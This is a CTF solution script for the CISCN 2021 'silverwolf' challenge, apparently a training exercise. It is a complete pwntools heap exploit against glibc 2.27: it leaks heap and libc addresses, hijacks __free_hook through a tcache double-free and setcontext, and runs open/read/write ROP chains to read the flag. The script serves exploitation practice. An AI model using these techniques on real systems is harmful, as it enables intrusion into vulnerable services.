练习5

[CISCN 2021 初赛]silverwolf

题目链接 : https://www.nssctf.cn/problem/912

from pwn import *

# Target setup. Every gadget offset later in the script is tied to the exact
# libc-2.27.so loaded here, and the remote host/port is a throwaway CTF
# instance, so both are expected to need adjusting before reuse.
context(os='linux', arch='amd64')
#context.log_level='debug'
io = remote("node4.anna.nssctf.cn", 28120)
# Swap the two lines above/below to run against a local copy of the binary.
#io = process("./silverwolf")
elf = ELF("./silverwolf")
libc = ELF("./libc-2.27.so")
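def debug(gdbscript=''):
    """Attach gdb to the target tube.

    Only useful when `io` is a local `process()`; attaching to a real remote
    host has nothing to attach to. `gdbscript` is forwarded to
    `gdb.attach` so breakpoints can be set up front (default: none).
    """
    gdb.attach(io, gdbscript=gdbscript)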

def malloc(size):
    """Menu option 1: allocate a chunk of `size` bytes into slot 0.

    The whole script works through index 0 only, so the index is fixed here.
    """
    io.sendlineafter(b'Your choice: ', b'1')
    io.sendlineafter(b'Index:', b'0')
    io.sendlineafter(b'Size:', f'{size}'.encode())

def edit(content):
    """Menu option 2: write `content` into the chunk held in slot 0.

    `sendlineafter` appends a newline; if the program copies up to the full
    chunk size that 0x0a byte lands in the chunk as well, so payloads that
    fill a chunk exactly should account for it.
    """
    io.sendlineafter(b'Your choice: ', b'2')
    io.sendlineafter(b'Index:', b'0')
    io.sendlineafter(b'Content:', content)

def show():
    """Menu option 3: print the chunk in slot 0 (caller parses the output)."""
    io.sendlineafter(b'Your choice: ', b'3')
    io.sendlineafter(b'Index:', b'0')

def free():
    """Menu option 4: free the chunk in slot 0.

    The exploit relies on the binary allowing this repeatedly on the same
    slot (see the double-free steps in the main flow).
    """
    io.sendlineafter(b'Your choice: ', b'4')
    io.sendlineafter(b'Index:', b'0')


# --- Stage 1: heap leak ---------------------------------------------------
# Allocate and free one 0x78-byte chunk, then read it back. The 6 bytes after
# "Content: " are treated as a heap pointer left in the freed chunk; 0x11b0 is
# the observed distance from that pointer to the heap base that every later
# chunk_base + ... offset in this script is measured from.
malloc(0x78)
free()
show()
io.recvuntil(b'Content: ')
chunk_base = u64(io.recv(6)[-6:].ljust(8, b'\x00')) - 0x11b0
print(f'chunk:{hex(chunk_base)}')
# Overwrite the first 8 bytes of the freed chunk (presumably its tcache `next`
# pointer) with a heap address, so the second malloc below hands back
# chunk_base + 0x16a0 — TODO confirm against this libc's tcache layout.
edit(p64(chunk_base + 0x16a0))
malloc(0x78)
malloc(0x78)
# Free the same chunk six more times. Each edit rewrites the pointer, and the
# trailing b'a' clobbers the byte right after it (the tcache `key` field on
# glibc 2.27), which is what lets the repeated frees pass the double-free
# check. NOTE(review): the intent looks like filling the 0x80 tcache bin so the
# last free goes to the unsorted bin — verify the count locally.
for i in range(6):
    edit(p64(chunk_base + 0x16a0) + b'a')
    free()
# --- Stage 2: libc leak ---------------------------------------------------
# Read the chunk again and take the last 6 bytes ending in 0x7f as a libc
# pointer. The arithmetic (leak - __malloc_hook - 0x70) is consistent with an
# unsorted-bin fd/bk pointing into main_arena on glibc 2.27.
show()
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym["__malloc_hook"] - 0x70
print(f'libc:{hex(libc_base)}')
# ROP gadgets. The raw offsets are specific to the bundled libc-2.27.so build
# and must be re-found (ROPgadget/ropper) for any other libc. Names reflect
# how the gadgets are used below (pop rdi / ret / pop rdx; pop rsi / pop rax /
# pop rsp); `syscall` assumes a `syscall` instruction 0xf bytes into read().
rdi = 0x215bf + libc_base
ret = 0x215c0 + libc_base
rdx_rsi = 0x130569 + libc_base
rax = libc_base + 0x43ae8
rsp = 0x3960 + libc_base
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
free_hook = libc_base + libc.sym["__free_hook"]
syscall = libc_base + libc.sym['read'] + 0xf
# --- Stage 3: hijack __free_hook ------------------------------------------
# Double-free a 0x50-byte chunk: zeroing its first 16 bytes between the two
# frees clears the tcache next/key fields so the second free is accepted.
# Then point the tcache next pointer at __free_hook so the second malloc
# returns it, and write setcontext+0x35 into the hook.
malloc(0x50)
free()
edit(p64(0)*2)
free()
edit(p64(free_hook))
malloc(0x50)
malloc(0x50)
edit(p64(libc_base + libc.sym["setcontext"] + 0x35))
# --- Stage 4: stage the register frame and ROP chains on the heap ---------
# Three 0x68-byte allocations come back at fixed heap offsets; the payloads
# reference each other by absolute address (chunk_base + ...), so every offset
# below depends on the heap layout observed for this binary — re-derive them
# locally if anything about the allocation sequence changes.
malloc(0x68)
# Frame read by setcontext+0x35. On glibc 2.27 it loads rsp from [rdi+0xa0]
# and the return address from [rdi+0xa8], rdi being the pointer passed to the
# final free; this chunk is presumably positioned so those slots hold
# chunk_base + 0x1398 and `ret`, after which `pop rsp` pivots to
# chunk_base + 0x10d8 — TODO confirm the chunk ordering with a local run.
payload = b''.ljust(0x30, b'\x00') + p64(chunk_base + 0x1398) + p64(ret) + p64(rsp) + p64(chunk_base + 0x10d8)
edit(payload)
malloc(0x68)
# "flag\0" followed by open("flag", 0, 0) done as a raw syscall (rax = 2)
# instead of libc open() — presumably to get past a syscall filter; TODO
# confirm. Ends with a second pivot to the read/write chain at + 0x12f0.
payload = b'flag'.ljust(8, b'\x00') + p64(rdi) + p64(chunk_base + 0x10d0) + p64(rdx_rsi) + p64(0) * 2 + p64(rax) + p64(2) + p64(syscall) + p64(rsp) + p64(chunk_base + 0x12f0)
edit(payload)
malloc(0x68)
# read(3, buf, 0x30); write(1, buf, 0x30) with buf = chunk_base + 0x16a8.
# Assumes the opened flag file receives fd 3 (first descriptor after stdio).
payload =p64(rdi) + p64(3) + p64(rdx_rsi) + p64(0x30) + p64(chunk_base + 0x16a8) + p64(read) + p64(rdi) + p64(1) + p64(rdx_rsi) + p64(0x30) + p64(chunk_base + 0x16a8) + p64(write)
edit(payload)
# NOTE(review): the script never calls free() after the last edit, so the
# __free_hook trigger is not issued here; the final free (menu 4, index 0) is
# presumably typed by hand in the interactive session.
#debug()
io.interactive()